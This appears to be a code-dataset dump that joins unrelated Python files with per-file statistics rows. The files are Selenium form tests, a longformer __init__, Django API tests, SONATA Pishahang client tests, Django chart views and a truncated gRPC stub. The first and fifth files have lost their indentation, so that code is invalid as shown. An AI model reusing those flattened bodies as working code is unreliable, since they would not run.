expect(is_displayed(very_parametrized_script_page.parameter_ip_v4), "IP v4 param not found")
expect(is_displayed(very_parametrized_script_page.parameter_ip_v6), "IP v6 param not found")
expect(is_displayed(very_parametrized_script_page.parameter_server_file), "Server file param not found")
expect(is_displayed(very_parametrized_script_page.parameter_recursive_file), "Recursive file param not found")
expect(not is_displayed(very_parametrized_script_page.parameter_inc_param1), "inc_param1 is displayed by default ")
expect(not is_displayed(very_parametrized_script_page.parameter_inc_param2), "inc_param2 is displayed by defaukt")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Check Default boolean is checked by default")
def test_default_boolean(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
assert very_parametrized_script_page.parameter_default_boolean.is_selected(), "Default boolean is not selected"
@severity(severity_level.NORMAL)
@allure.title("Uncheck Default boolean")
def test_uncheck_default_boolean(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.parameter_default_boolean_label.click()
assert not very_parametrized_script_page.parameter_default_boolean.is_selected(), "Default boolean is selected"
@severity(severity_level.NORMAL)
@allure.title("Check Simple boolean is unchecked by default")
def test_simple_boolean(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
assert not very_parametrized_script_page.parameter_simple_boolean.is_selected(), "Default boolean is not selected"
@severity(severity_level.NORMAL)
@allure.title("Check Simple boolean")
def test_check_simple_boolean(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.parameter_simple_boolean_label.click()
assert very_parametrized_script_page.parameter_simple_boolean.is_selected(), "Default boolean is selected"
@severity(severity_level.NORMAL)
@allure.title("Simple int is empty by default")
def test_check_simple_int_by_default(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
assert very_parametrized_script_page.parameter_simple_int.text == "", "Simple int is not empty by default"
@severity(severity_level.NORMAL)
@allure.title("Try to input string in simple int")
def test_input_string_in_simple_int(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.parameter_simple_int.send_keys("String value" + Keys.ENTER)
assert get_underline_error_text(very_parametrized_script_page.parameter_simple_int) == "integer expected"
@severity(severity_level.NORMAL)
@allure.title("Try to input int in simple int")
def test_input_int_in_simple_int(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
random_int = random.randint(0, sys.maxsize)
very_parametrized_script_page.parameter_simple_int.clear()
very_parametrized_script_page.parameter_simple_int.send_keys(str(random_int) + Keys.ENTER)
expect(very_parametrized_script_page.parameter_simple_int.get_attribute("class") == "validate valid", "Class is not valid")
expect(very_parametrized_script_page.parameter_simple_int.get_attribute('value') == str(random_int), "Field text is not equal to input")
expect(get_underline_error_text(very_parametrized_script_page.parameter_simple_int) == "", "Underline text error is not empty: " + str(get_underline_error_text(very_parametrized_script_page.parameter_simple_int)))
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Input random string in simple text")
def test_input_text_in_simple_text(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
random_srting = ''.join(random.choices(string.ascii_letters + string.digits, k=random.randint(0, 254)))
very_parametrized_script_page.parameter_simple_text.send_keys(random_srting)
expect(very_parametrized_script_page.parameter_simple_text.get_attribute('value') == str(random_srting), "Field text is not equal to input")
expect(get_underline_error_text(very_parametrized_script_page.parameter_simple_text) == "", "Underline text error is not empty: " + str(get_underline_error_text(very_parametrized_script_page.parameter_simple_text)))
very_parametrized_script_page.parameter_simple_text.send_keys(Keys.ENTER)
expect(very_parametrized_script_page.parameter_simple_text.get_attribute("class") == "validate valid", "Class is not valid")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Input key text in simple text")
def test_input_key_text_in_simple_text(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.parameter_simple_text.clear()
very_parametrized_script_page.parameter_simple_text.send_keys("included")
expect(is_displayed(very_parametrized_script_page.parameter_inc_param1), "inc_param1 is not displayed. Simple text value is: " + str(very_parametrized_script_page.parameter_simple_text.get_attribute('value')))
expect(is_displayed(very_parametrized_script_page.parameter_inc_param2), "inc_param2 is not displayed. Simple text value is: " + str(very_parametrized_script_page.parameter_simple_text.get_attribute('value')))
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Edit appeared inc_params")
def test_input_text_in_inc_params(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
random_srting1 = ''.join(random.choices(string.ascii_letters + string.digits, k=random.randint(0, 254)))
very_parametrized_script_page.parameter_inc_param1.send_keys(random_srting1)
random_srting2 = ''.join(random.choices(string.ascii_letters + string.digits, k=random.randint(0, 254)))
very_parametrized_script_page.parameter_inc_param2.send_keys(random_srting2)
expect(very_parametrized_script_page.parameter_inc_param1.get_attribute('value') == str(random_srting1), "Field text is not equal to input")
expect(get_underline_error_text(very_parametrized_script_page.parameter_inc_param1) == "", "Underline text error is not empty: " + str(get_underline_error_text(very_parametrized_script_page.parameter_inc_param1)))
very_parametrized_script_page.parameter_inc_param1.send_keys(Keys.ENTER)
expect(very_parametrized_script_page.parameter_inc_param1.get_attribute("class") == "validate valid", "Class is not valid")
expect(very_parametrized_script_page.parameter_inc_param2.get_attribute('value') == str(random_srting2), "Field text is not equal to input")
expect(get_underline_error_text(very_parametrized_script_page.parameter_inc_param2) == "", "Underline text error is not empty: " + str(get_underline_error_text(very_parametrized_script_page.parameter_inc_param2)))
very_parametrized_script_page.parameter_inc_param2.send_keys(Keys.ENTER)
expect(very_parametrized_script_page.parameter_inc_param2.get_attribute("class") == "validate valid", "Class is not valid")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Edit simple text to hide inc_params")
def test_edit_simple_text_to_hide_inc_params(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.parameter_simple_text.send_keys("something")
expect(not is_displayed(very_parametrized_script_page.parameter_inc_param1), "inc_param1 is displayed while not key text is in simple text field is presented")
expect(not is_displayed(very_parametrized_script_page.parameter_inc_param2), "inc_param2 is displayed while not key text is in simple text field is presented")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Open drop-down for simple list parameter")
def test_click_simple_list(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.parameter_simple_list.click()
expect(is_displayed(very_parametrized_script_page.parameter_simple_list_drop_down), "Drop down on list parameter click was not opened")
expect(len(very_parametrized_script_page.parameter_simple_list_drop_down_elements) > 0, "Drop down list has no elements")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Select random element from drop-down list")
def test_click_random_drop_down_element(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
random_drop_down_element = random.choice(very_parametrized_script_page.parameter_simple_list_drop_down_elements)
random_drop_down_element.click()
expect(str(very_parametrized_script_page.parameter_simple_list.get_attribute('value')) == str(random_drop_down_element.get_attribute('title')), "Field text is not equal to input")
expect(random_drop_down_element.get_attribute("class").find("selected") > -1, "Selected element has not class \"selected\"")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Open drop-down for command based list parameter")
def test_click_command_based_list(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.parameter_command_based_list.click()
expect(is_displayed(very_parametrized_script_page.command_based_list), "Command based List was not opened on click")
expect(is_displayed(very_parametrized_script_page.search_field_in_command_based_list), "Search field in command based list was not opened on click")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Search in command based list parameter")
def test_search_in_command_based_list(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.search_field_in_command_based_list.send_keys(search_request)
expect(is_displayed(very_parametrized_script_page.command_based_list), "Command based List is not displayed after search")
for element in get_visible_values_of_list(very_parametrized_script_page.command_based_list):
expect(is_displayed(element), "Visible list element is not displayed")
for element in get_hidden_values_of_list(very_parametrized_script_page.command_based_list):
expect(not is_displayed(element), "Hidden list element is not displayed")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Search in command based list parameter")
def test_check_search_results_in_command_based_list(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
for element in get_visible_values_of_list(very_parametrized_script_page.command_based_list):
expect(str(element.text).find(search_request) > -1)
assert_expectations()
| 58.058594 | 219 | 0.827357 | 2,001 | 14,863 | 5.745127 | 0.076962 | 0.143354 | 0.197112 | 0.232951 | 0.851166 | 0.826548 | 0.803236 | 0.787491 | 0.75635 | 0.674408 | 0 | 0.003714 | 0.094328 | 14,863 | 255 | 220 | 58.286275 | 0.850308 | 0 | 0 | 0.285714 | 0 | 0 | 0.184283 | 0 | 0 | 0 | 0 | 0 | 0.104396 | 1 | 0.098901 | false | 0 | 0.049451 | 0 | 0.148352 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
54d309f80cd6d5577722b03bce21a11ffd32c9dd | 237 | py | Python | longformer/__init__.py | neo-pan/TSP_Transformer | 3fe66390e1c2457b3bf2a07fdfa427b0f2fd5af5 | [
"MIT"
] | null | null | null | longformer/__init__.py | neo-pan/TSP_Transformer | 3fe66390e1c2457b3bf2a07fdfa427b0f2fd5af5 | [
"MIT"
] | null | null | null | longformer/__init__.py | neo-pan/TSP_Transformer | 3fe66390e1c2457b3bf2a07fdfa427b0f2fd5af5 | [
"MIT"
] | null | null | null | from longformer.longformer import LongformerSelfAttention
from longformer.longformer_encoder_decoder import LongformerEncoderDecoderConfig
from longformer.longformer_encoder_decoder import LongformerEncoderDecoderForConditionalGeneration | 79 | 98 | 0.940928 | 19 | 237 | 11.526316 | 0.421053 | 0.191781 | 0.328767 | 0.283105 | 0.401826 | 0.401826 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046414 | 237 | 3 | 98 | 79 | 0.969027 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
54d360c7c725a7116ac449d327403158b8f1458e | 9,905 | py | Python | suggestions/tests/test_api.py | kraupn3r/intranet | 4cabf6f365ef0ea0f352f67f9322318e161ed265 | [
"MIT"
] | null | null | null | suggestions/tests/test_api.py | kraupn3r/intranet | 4cabf6f365ef0ea0f352f67f9322318e161ed265 | [
"MIT"
] | null | null | null | suggestions/tests/test_api.py | kraupn3r/intranet | 4cabf6f365ef0ea0f352f67f9322318e161ed265 | [
"MIT"
] | null | null | null | import json
from django.urls import reverse
from accounts.models import UserProfile
from django.contrib.auth.models import User
from django.contrib.auth.models import Permission
from django.contrib.auth.models import Group
from rest_framework.test import APIRequestFactory, APITestCase
from ..models import Post, BoardCategory, Comment
from ..api.views import PostListAPIView, CommentAPIView, PostDetailAPIView, BoardCategoryListAPIView
from rest_framework_jwt.settings import api_settings
jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
def get_token(user):
payload = jwt_payload_handler(user)
token = jwt_encode_handler(payload)
return token
class TestPostListAPIView(APITestCase):
@classmethod
def setUpTestData(cls):
cls.test_user1 = User.objects.create_user(
username='testuser1', password='1X<ISRUkw+tuK')
newgroup = Group.objects.create(name='testgroup')
for each in Permission.objects.all():
newgroup.permissions.add(each)
cls.test_user1.groups.add(newgroup)
test_user1_userprofile = UserProfile.objects.create(
user=cls.test_user1,
name='Test User1',
telephone='11',
email='testuser1@email.com',
employee_id='2',
departament='sal',
location='WAW'
)
test_user1_userprofile.save()
cls.factory = APIRequestFactory()
test_board_category1 = BoardCategory.objects.create(
title='test title 1'
)
test_board_category2 = BoardCategory.objects.create(
title='test title 2'
)
test_post_1 = Post.objects.create(
body='test body 1',
title='test title 1',
category=test_board_category1,
author=cls.test_user1
)
test_post_2 = Post.objects.create(
body='test body 2',
title='test title 2',
category=test_board_category1,
author=cls.test_user1
)
test_post_3 = Post.objects.create(
body='test body 3',
title='test title 3',
category=test_board_category2,
author=cls.test_user1
)
test_comment1 = Comment.objects.create(
Post=test_post_1,
body='test comment body 1',
author=cls.test_user1
)
test_comment2 = Comment.objects.create(
Post=test_post_2,
body='test comment body 2',
author=cls.test_user1
)
def test_queryset(self):
user = self.test_user1
token = get_token(user)
request = self.factory.get(
'/suggestions/api/postlist/',
HTTP_AUTHORIZATION='JWT ' + token)
view = PostListAPIView.as_view()
response = view(request)
response.render()
self.assertEquals(len(json.loads(response.content)), 3)
def test_queryset_w_params(self):
user = self.test_user1
token = get_token(user)
request = self.factory.get(
'/suggestions/api/postlist/?id=2',
HTTP_AUTHORIZATION='JWT ' + token)
view = PostListAPIView.as_view()
response = view(request)
response.render()
self.assertEquals(len(json.loads(response.content)), 1)
def test_post_create(self):
user = self.test_user1
token = get_token(user)
data = {
'body': 'test body 4',
'title': 'test title 4',
'category': '1'
}
request = self.factory.post(
'/suggestions/api/postlist/', data,
HTTP_AUTHORIZATION='JWT ' + token)
view = PostListAPIView.as_view()
response = view(request)
response.render()
self.assertEquals(response.status_code, 201)
request = self.factory.get(
'/suggestions/api/postlist/',
HTTP_AUTHORIZATION='JWT ' + token)
view = PostListAPIView.as_view()
response = view(request)
response.render()
self.assertEquals(len(json.loads(response.content)), 4)
class TestPostDetailAPIView(APITestCase):
@classmethod
def setUpTestData(cls):
cls.test_user1 = User.objects.create_user(
username='testuser1', password='1X<ISRUkw+tuK')
newgroup = Group.objects.create(name='testgroup')
for each in Permission.objects.all():
newgroup.permissions.add(each)
cls.test_user1.groups.add(newgroup)
test_user1_userprofile = UserProfile.objects.create(
user=cls.test_user1,
name='Test User1',
telephone='11',
email='testuser1@email.com',
employee_id='2',
departament='sal',
location='WAW'
)
test_user1_userprofile.save()
cls.factory = APIRequestFactory()
test_board_category1 = BoardCategory.objects.create(
title='test title 1'
)
test_board_category2 = BoardCategory.objects.create(
title='test title 2'
)
test_post_1 = Post.objects.create(
body='test body 1',
title='test title 1',
category=test_board_category1,
author=cls.test_user1
)
test_post_2 = Post.objects.create(
body='test body 2',
title='test title 2',
category=test_board_category1,
author=cls.test_user1
)
test_post_3 = Post.objects.create(
body='test body 3',
title='test title 3',
category=test_board_category2,
author=cls.test_user1
)
test_comment1 = Comment.objects.create(
Post=test_post_1,
body='test comment body 1',
author=cls.test_user1
)
test_comment2 = Comment.objects.create(
Post=test_post_2,
body='test comment body 2',
author=cls.test_user1
)
# print(json.loads(response.content))
def test_queryset(self):
user = self.test_user1
token = get_token(user)
request = self.factory.get(
'/suggestions/api/1',
HTTP_AUTHORIZATION='JWT ' + token)
view = PostDetailAPIView.as_view()
response = view(request, pk=1)
response.render()
self.assertEquals(response.status_code, 200)
self.assertEquals(len(json.loads(response.content)), 8)
class TestCommentAPIView(APITestCase):
@classmethod
def setUpTestData(cls):
cls.test_user1 = User.objects.create_user(
username='testuser1', password='1X<ISRUkw+tuK')
newgroup = Group.objects.create(name='testgroup')
for each in Permission.objects.all():
newgroup.permissions.add(each)
cls.test_user1.groups.add(newgroup)
test_user1_userprofile = UserProfile.objects.create(
user=cls.test_user1,
name='Test User1',
telephone='11',
email='testuser1@email.com',
employee_id='2',
departament='sal',
location='WAW'
)
test_user1_userprofile.save()
cls.factory = APIRequestFactory()
test_board_category1 = BoardCategory.objects.create(
title='test title 1'
)
test_post_1 = Post.objects.create(
body='test body 1',
title='test title 1',
category=test_board_category1,
author=cls.test_user1
)
def test_comment_create(self):
user = self.test_user1
token = get_token(user)
data = {
'Post': 1,
'body': 'test comment body',
}
request = self.factory.post(
'/suggestions/api/comment/', data,
HTTP_AUTHORIZATION='JWT ' + token)
view = CommentAPIView.as_view()
response = view(request)
response.render()
self.assertEquals(response.status_code, 201)
expected_response = {'Post': 1, 'body': 'test comment body'}
self.assertEquals(json.loads(response.content), expected_response)
request = self.factory.get(
'/suggestions/api/1',
HTTP_AUTHORIZATION='JWT ' + token)
view = PostDetailAPIView.as_view()
response = view(request, pk=1)
response.render()
self.assertEquals(len(json.loads(response.content)['comments']), 1)
class TestBoardCategoryListAPIView(APITestCase):
@classmethod
def setUpTestData(cls):
cls.test_user1 = User.objects.create_user(
username='testuser1', password='1X<ISRUkw+tuK')
newgroup = Group.objects.create(name='testgroup')
for each in Permission.objects.all():
newgroup.permissions.add(each)
cls.test_user1.groups.add(newgroup)
test_user1_userprofile = UserProfile.objects.create(
user=cls.test_user1,
name='Test User1',
telephone='11',
email='testuser1@email.com',
employee_id='2',
departament='sal',
location='WAW'
)
test_user1_userprofile.save()
cls.factory = APIRequestFactory()
test_board_category1 = BoardCategory.objects.create(
title='test title 1'
)
test_board_category2 = BoardCategory.objects.create(
title='test title 2'
)
def test_queryset(self):
user = self.test_user1
token = get_token(user)
request = self.factory.get(
'/suggestions/api/',
HTTP_AUTHORIZATION='JWT ' + token)
view = BoardCategoryListAPIView.as_view()
response = view(request)
response.render()
self.assertEquals(len(json.loads(response.content)), 2)
| 31.344937 | 100 | 0.597375 | 1,039 | 9,905 | 5.538017 | 0.111646 | 0.064129 | 0.047967 | 0.034411 | 0.862704 | 0.847932 | 0.802225 | 0.791623 | 0.791623 | 0.786931 | 0 | 0.020818 | 0.301666 | 9,905 | 315 | 101 | 31.444444 | 0.811045 | 0.003534 | 0 | 0.74717 | 0 | 0 | 0.092724 | 0.013579 | 0 | 0 | 0 | 0 | 0.037736 | 1 | 0.041509 | false | 0.015094 | 0.037736 | 0 | 0.098113 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0702149b84c33aec2f35646ecdc185d7f0d3eb39 | 5,854 | py | Python | tests/sonata/test_pishahang.py | CN-UPB/python-mano-wrappers | 8e3607feaa97bc3e2c906ee8e4b25b21853ea6cf | [
"Apache-2.0"
] | null | null | null | tests/sonata/test_pishahang.py | CN-UPB/python-mano-wrappers | 8e3607feaa97bc3e2c906ee8e4b25b21853ea6cf | [
"Apache-2.0"
] | null | null | null | tests/sonata/test_pishahang.py | CN-UPB/python-mano-wrappers | 8e3607feaa97bc3e2c906ee8e4b25b21853ea6cf | [
"Apache-2.0"
] | null | null | null | from wrappers import SONATAClient
from pytest import fixture
from .sonata_fixture import *
from .config import *
import json
import time
from .helpers import Helpers
def test_get_csd_descriptors(get_csd_descriptors_keys):
"""Tests API call to fetch multiple NS descriptor resources"""
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
response = json.loads(sonata_pishahang.get_csd_descriptors(
token=_token["token"]["access_token"], limit=1000))
response = json.loads(response["data"])
assert isinstance(response, list)
if len(response) > 0:
assert set(get_csd_descriptors_keys).issubset(
response[0].keys()), "All keys should be in the response"
def test_post_csd_descriptors(post_csd_descriptors_keys):
"""Tests API call to onboard VNF descriptor resources"""
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
Helpers._delete_test_csds(_token=_token["token"]["access_token"])
response = json.loads(sonata_pishahang.post_csd_descriptors(
token=_token["token"]["access_token"],
package_path="tests/samples/csd_example.yml"))
print(response)
assert response['error'] == False
assert response['data'] != ''
def test_post_cosd_descriptors(post_cosd_descriptors_keys):
"""Tests API call to onboard NS descriptor resources"""
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
Helpers._delete_test_cosds(_token=_token["token"]["access_token"])
response = json.loads(sonata_pishahang.post_cosd_descriptors(
token=_token["token"]["access_token"],
package_path="tests/samples/cosd_example.yml"))
assert response['error'] == False
assert response['data'] != ''
def test_get_cosd_descriptors(get_cosd_descriptors_keys):
"""Tests API call to fetch multiple NS descriptor resources"""
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
response = json.loads(sonata_pishahang.get_cosd_descriptors(
token=_token["token"]["access_token"], limit=1000))
response = json.loads(response["data"])
assert isinstance(response, list)
if len(response) > 0:
assert set(get_cosd_descriptors_keys).issubset(
response[0].keys()), "All keys should be in the response"
def test_post_cs_instances_nsinstanceid_instantiate(post_cs_instances_nsinstanceid_instantiate_keys):
"""Tests API call to instantiate an NS"""
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
_cosd_list = json.loads(sonata_pishahang.get_cosd_descriptors(token=_token["token"]["access_token"]))
_cosd_list = json.loads(_cosd_list["data"])
_ns = None
for _n in _cosd_list:
if "scramble-cosd" == _n['cosd']['name']:
_ns = _n['uuid']
print(_ns)
if _ns:
response = json.loads(
sonata_pishahang.post_cs_instances_nsinstanceid_instantiate(
token=_token["token"]["access_token"], nsInstanceId=_ns))
print(response)
assert response['error'] == False
response = json.loads(response["data"])
assert isinstance(response, dict)
assert set(post_cs_instances_nsinstanceid_instantiate_keys).issubset(
response.keys()), "All keys should be in the response"
else:
return False
def test_post_cs_instances_nsinstanceid_terminate(post_cs_instances_nsinstanceid_terminate_keys):
"""Tests API call to instantiate an NS"""
sonata_nslcm = SONATAClient.Nslcm(HOST_URL)
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
_csd_list = json.loads(sonata_pishahang.get_csd_descriptors(
token=_token["token"]["access_token"]))
_csd_list = json.loads(_csd_list["data"])
_ns_list = json.loads(sonata_nslcm.get_ns_instances(
token=_token["token"]["access_token"]))
_ns_list = json.loads(_ns_list["data"])
_ns = None
for _n in _csd_list:
if "scramble-csd" == _n['csd']['name']:
print(_n['uuid'])
for _n2 in _ns_list:
print(_n2)
if _n['uuid'] == _n2['descriptor_reference']:
_ns = _n2['uuid']
if _ns:
response = json.loads(
sonata_pishahang.post_cs_instances_nsinstanceid_terminate(
token=_token["token"]["access_token"], nsInstanceId=_ns))
assert response['error'] == False
response = json.loads(response["data"])
assert isinstance(response, dict)
assert set(post_cs_instances_nsinstanceid_terminate_keys).issubset(
response.keys()), "All keys should be in the response"
else:
return False
| 39.823129 | 105 | 0.669286 | 686 | 5,854 | 5.389213 | 0.123907 | 0.068163 | 0.06086 | 0.062483 | 0.85096 | 0.833108 | 0.783067 | 0.725453 | 0.725453 | 0.67947 | 0 | 0.003506 | 0.220533 | 5,854 | 146 | 106 | 40.09589 | 0.806706 | 0.048855 | 0 | 0.587156 | 0 | 0 | 0.097252 | 0.010665 | 0 | 0 | 0 | 0 | 0.12844 | 1 | 0.055046 | false | 0.055046 | 0.06422 | 0 | 0.137615 | 0.045872 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
0723bada5c09f2707349426e8a669be531eb2648 | 2,989 | py | Python | smarthome/src/RT_Data_Interaction/myhome/views.py | hpecl-sspku/hpecl-2017 | 895757eb7d5f984e0268ab99da95663172bc2f50 | [
"MIT"
] | null | null | null | smarthome/src/RT_Data_Interaction/myhome/views.py | hpecl-sspku/hpecl-2017 | 895757eb7d5f984e0268ab99da95663172bc2f50 | [
"MIT"
] | 8 | 2018-03-19T03:24:56.000Z | 2018-07-31T15:25:25.000Z | smarthome/src/RT_Data_Interaction/myhome/views.py | hpecl-sspku/hpecl-2017 | 895757eb7d5f984e0268ab99da95663172bc2f50 | [
"MIT"
] | 3 | 2018-11-13T06:46:51.000Z | 2020-07-20T05:53:56.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django.shortcuts import render
from django.http import HttpResponse
from . import models
# Create your views here.
def index(request):
nodedata = models.Nodedata.objects.order_by('-id')[0]
commands = models.Commands.objects.get(pk=1)
return render(request, 'myhome/index.html', {'commands': commands, 'nodedata': nodedata})
# return render(request, 'myhome/index.html', {'commands': commands, 'nodedata': nodedata.toJSON})
def bar1(request):
nodedatas = models.Nodedata.objects.all()
listx = []
listy = []
datetmp = '0'
flag = 0
for nodedata in nodedatas[::-1]:
date = str(nodedata.time)[0:10]
if datetmp == date:
pass
else:
datetmp = date
flag = flag + 1
if flag == 8:
break
else:
listx.append(str(date))
listy.append(float(nodedata.temperature))
listx = listx[::-1]
listy = listy[::-1]
return render(request, 'myhome/bar1.html', {'nodedatas':nodedatas, 'X':listx, 'Y':listy})
def bar2(request):
nodedatas = models.Nodedata.objects.all()
listx = []
listy = []
datetmp = '0'
flag = 0
for nodedata in nodedatas[::-1]:
date = str(nodedata.time)[0:10]
if datetmp == date:
pass
else:
datetmp = date
flag = flag + 1
if flag == 8:
break
else:
listx.append(str(date))
listy.append(float(nodedata.humidity))
listx = listx[::-1]
listy = listy[::-1]
return render(request, 'myhome/bar2.html', {'nodedatas':nodedatas, 'X':listx, 'Y':listy})
def bar3(request):
nodedatas = models.Nodedata.objects.all()
listx = []
listy = []
datetmp = '0'
flag = 0
for nodedata in nodedatas[::-1]:
date = str(nodedata.time)[0:10]
if datetmp == date:
pass
else:
datetmp = date
flag = flag + 1
if flag == 8:
break
else:
listx.append(str(date))
listy.append(float(nodedata.light))
listx = listx[::-1]
listy = listy[::-1]
return render(request, 'myhome/bar3.html', {'nodedatas':nodedatas, 'X':listx, 'Y':listy})
def bar4(request):
nodedatas = models.Nodedata.objects.all()
listx = []
listy = []
datetmp = '0'
flag = 0
for nodedata in nodedatas[::-1]:
date = str(nodedata.time)[0:10]
if datetmp == date:
pass
else:
datetmp = date
flag = flag + 1
if flag == 8:
break
else:
listx.append(str(date))
listy.append(float(nodedata.co2_simulation))
listx = listx[::-1]
listy = listy[::-1]
return render(request, 'myhome/bar4.html', {'nodedatas':nodedatas, 'X':listx, 'Y':listy})
def bar5(request):
nodedatas = models.Nodedata.objects.all()
listx = []
listy = []
datetmp = '0'
flag = 0
for nodedata in nodedatas[::-1]:
date = str(nodedata.time)[0:10]
if datetmp == date:
pass
else:
datetmp = date
flag = flag + 1
if flag == 8:
break
else:
listx.append(str(date))
listy.append(float(nodedata.noise))
listx = listx[::-1]
listy = listy[::-1]
return render(request, 'myhome/bar5.html', {'nodedatas':nodedatas, 'X':listx, 'Y':listy})
| 23.535433 | 98 | 0.642355 | 402 | 2,989 | 4.758706 | 0.166667 | 0.057501 | 0.069524 | 0.091479 | 0.828542 | 0.828019 | 0.828019 | 0.810246 | 0.73288 | 0.73288 | 0 | 0.026381 | 0.188357 | 2,989 | 126 | 99 | 23.722222 | 0.76216 | 0.047508 | 0 | 0.789474 | 0 | 0 | 0.061906 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.04386 | 0.04386 | 0 | 0.149123 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
072493cc577da615c68ada624442a3f6b7c05920 | 53,559 | py | Python | fedn/fedn/common/net/grpc/fedn_pb2_grpc.py | eriks-aidotse/fedn | ab784e6ac45fd02be4532c9bbc8d5b8c75b62d51 | [
"Apache-2.0"
] | 75 | 2020-07-19T10:40:15.000Z | 2022-03-13T06:56:04.000Z | fedn/fedn/common/net/grpc/fedn_pb2_grpc.py | eriks-aidotse/fedn | ab784e6ac45fd02be4532c9bbc8d5b8c75b62d51 | [
"Apache-2.0"
] | 124 | 2020-07-27T18:16:21.000Z | 2022-03-10T12:16:04.000Z | fedn/fedn/common/net/grpc/fedn_pb2_grpc.py | eriks-aidotse/fedn | ab784e6ac45fd02be4532c9bbc8d5b8c75b62d51 | [
"Apache-2.0"
] | 28 | 2020-08-14T19:39:30.000Z | 2022-03-16T10:29:09.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from fedn.common.net.grpc import fedn_pb2 as fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2
class ModelServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Upload = channel.stream_unary(
